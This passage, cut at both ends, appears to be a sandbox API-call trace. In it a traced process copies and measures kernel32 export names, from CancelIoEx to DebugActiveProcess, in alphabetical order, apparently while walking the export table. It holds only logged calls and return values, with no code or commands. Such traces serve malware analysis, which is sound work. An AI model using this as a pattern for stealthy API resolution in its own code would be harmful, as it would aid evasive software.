lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0183.696] lstrlenA (lpString="CANCELIOEX") returned 10 [0183.696] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0183.696] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0183.696] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0183.696] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0183.696] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0183.696] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0183.696] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0183.696] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0183.696] lstrcpyA (in: lpString1=0x36fce30, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0183.696] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0183.696] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0183.696] lstrlenA (lpString="CHECKELEVATION") returned 14 [0183.696] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0183.696] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0183.696] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0183.696] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0183.696] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0183.696] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0183.696] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0183.696] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0183.696] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0183.696] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0183.696] lstrcpyA (in: lpString1=0x36fce30, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0183.696] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0183.696] lstrcpyA (in: lpString1=0x36fce30, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0183.696] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0183.696] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0183.696] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0183.696] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0183.697] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0183.697] lstrcpyA (in: lpString1=0x36fce30, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0183.697] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0183.697] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0183.697] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0183.697] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0183.697] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0183.697] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0183.697] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0183.697] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0183.697] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0183.697] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0183.697] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0183.697] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0183.697] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0183.697] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0183.697] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0183.697] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0183.697] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0183.697] lstrcpyA (in: lpString1=0x36fce30, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0183.697] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0183.697] lstrcpyA (in: lpString1=0x36fce30, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0183.697] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0183.697] lstrcpyA (in: lpString1=0x36fce30, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0183.697] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0183.697] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0183.697] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0183.697] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0183.697] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0183.697] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0183.697] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0183.697] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0183.697] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0183.697] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0183.697] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0183.697] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0183.697] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0183.698] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0183.698] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0183.698] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0183.698] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0183.698] lstrcpyA (in: lpString1=0x36fce30, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0183.698] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0183.698] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0183.698] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0183.698] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0183.698] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0183.698] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0183.698] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0183.698] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0183.698] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0183.698] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0183.698] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0183.698] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0183.698] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0183.698] lstrcpyA (in: lpString1=0x36fce30, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0183.698] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0183.698] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0183.698] lstrlenA (lpString="COPYCONTEXT") returned 11 [0183.698] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0183.698] lstrlenA (lpString="COPYFILEA") returned 9 [0183.698] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0183.698] lstrlenA (lpString="COPYFILEEXA") returned 11 [0183.698] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0183.698] lstrlenA (lpString="COPYFILEEXW") returned 11 [0183.698] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0183.698] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0183.710] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0183.710] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0183.710] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0183.710] lstrlenA (lpString="COPYFILEW") returned 9 [0183.710] lstrcpyA (in: lpString1=0x36fce30, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0183.710] lstrlenA (lpString="COPYLZFILE") returned 10 [0183.710] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0183.710] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0183.710] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0183.711] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0183.711] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0183.711] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0183.711] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0183.711] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0183.711] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0183.711] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0183.711] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0183.711] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0183.711] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0183.711] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0183.711] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0183.711] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0183.711] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0183.711] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0183.711] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0183.711] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0183.711] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0183.711] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0183.711] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0183.711] lstrlenA (lpString="CREATEEVENTA") returned 12 [0183.711] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0183.711] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0183.711] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0183.711] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0183.711] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0183.711] lstrlenA (lpString="CREATEEVENTW") returned 12 [0183.711] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0183.711] lstrlenA (lpString="CREATEFIBER") returned 11 [0183.711] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0183.711] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0183.711] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0183.711] lstrlenA (lpString="CREATEFILEA") returned 11 [0183.711] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0183.711] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0183.711] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0183.711] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0183.711] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0183.712] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0183.712] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0183.712] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0183.712] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0183.712] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0183.712] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0183.712] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0183.712] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0183.712] lstrlenA (lpString="CREATEFILEW") returned 11 [0183.712] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0183.712] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0183.712] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0183.712] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0183.712] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0183.712] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0183.712] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0183.712] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0183.712] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0183.712] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0183.712] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0183.712] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0183.712] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0183.712] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0183.712] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0183.712] lstrlenA (lpString="CREATEJOBSET") returned 12 [0183.712] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0183.712] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0183.712] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0183.712] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0183.712] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0183.712] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0183.712] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0183.712] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0183.712] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0183.712] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0183.712] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0183.712] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0183.713] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0183.713] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0183.713] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0183.713] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0183.713] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0183.713] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0183.713] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0183.713] lstrlenA (lpString="CREATEPIPE") returned 10 [0183.713] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0183.713] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0183.713] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0183.713] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0183.713] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0183.713] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0183.713] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0183.713] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0183.713] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0183.713] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0183.713] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0183.713] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0183.713] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0183.713] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0183.713] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0183.713] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0183.713] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0183.713] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0183.713] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0183.713] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0183.713] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0183.713] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0183.713] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0183.713] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0183.713] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0183.713] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0183.713] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0183.713] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0183.713] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0183.713] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0183.714] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0183.714] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0183.714] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0183.714] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0183.714] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0183.714] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0183.714] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0183.714] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0183.714] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0183.714] lstrlenA (lpString="CREATETHREAD") returned 12 [0183.714] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0183.714] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0183.714] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0183.714] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0183.714] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0183.714] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0183.714] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0183.714] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0183.714] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0183.714] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0183.714] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0183.714] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0183.714] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0183.714] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0183.714] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0183.714] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0183.714] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0183.714] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0183.714] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0183.714] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0183.714] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0183.714] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0183.714] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0183.714] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0183.714] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0183.714] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0183.715] lstrcpyA (in: lpString1=0x36fce30, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0183.715] lstrlenA (lpString="CTRLROUTINE") returned 11 [0183.715] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0183.715] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0183.715] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0183.715] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0183.715] lstrcpyA 